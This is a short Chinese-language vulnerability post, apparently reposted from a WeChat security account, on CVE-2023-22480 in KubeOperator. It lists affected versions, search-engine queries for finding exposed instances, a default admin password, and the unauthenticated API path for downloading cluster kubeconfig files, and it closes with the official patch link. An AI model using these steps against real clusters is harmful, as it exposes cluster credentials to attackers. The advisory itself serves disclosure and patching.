【漏洞速递 | 附EXP】CVE-2023-22480漏洞
2023-6-13 18:11:21 Author: EchoSec(查看原文) 阅读量:40 收藏

0x01 漏洞描述

一个开源的轻量级 Kubernetes 发行版,专注于帮助企业规划、部署和运营生产级别的 K8s 集群。KubeOperator 3.16.4之前版本存在授权问题漏洞,该漏洞源于API与未经授权的实体交互,由于下载kubeconfig的路径不需要身份认证,导致攻击者可直接下载kubeconfig获取相关敏感信息

0x02 影响版本

KubeOperator < 3.16.4

0x03 漏洞复现

FOFA空间搜索引擎语句

app="KubeOperator" && status_code="200"

ZoomEye空间搜索引擎语法

title:"KubeOperator"

登录页面是这个酱紫

默认账号密码

adminkubeoperator@admin23

注意这个集群名称,未授权的时候会用到

访问该接口+集群名称当集群存在时即可通过接口未授权下载配置文件

http://ip/api/v1/clusters/kubeconfig/stable-cluster

0x04 修复方案

官方已给出修复方案建议及时更新补丁https://github.com/KubeOperator/KubeOperator/releases/tag/v3.16.4

 往期回顾

1111
  1.  | CVE-2023-33246 RCE漏洞(附EXP)

  2.  | 横向移动与域控权限维持方法总汇

  3.  | Apache HTTPd最新RCE漏洞复现

  4.  | CNVD-2023-34111 RCE漏洞(附EXP)

  5.  | Cobalt Strike免杀脚本生成器|cna脚本|bypassAV

  6.  | MySQL数据库利用姿势

  7.  | phpMyAdmin漏洞利用汇总

  8.  | 泛微E-Mobile任意文件上传漏洞(附EXP)

  9.  | 小技巧~用一条命令来隐藏反向Shell

  10.  New免杀ShellCode加载器(附下载)

  11.  | 红队攻防 | 解决HW被疯狂封IP姿势~(附下载)

  1. 关注我

    获得更多精彩

  2. 觉得内容不错,就点下在看
    如侵权请私聊公众号删文


文章来源: http://mp.weixin.qq.com/s?__biz=MzU3MTU3NTY2NA==&mid=2247487827&idx=1&sn=673192031c41b4f917fb9d488d515098&chksm=fcdf4d4ccba8c45a55b864cb344e6ff7e91b3c0c6c19cbc0d3f51d68b4dd977305532abe83a1#rd
如有侵权请联系:admin#unsafe.sh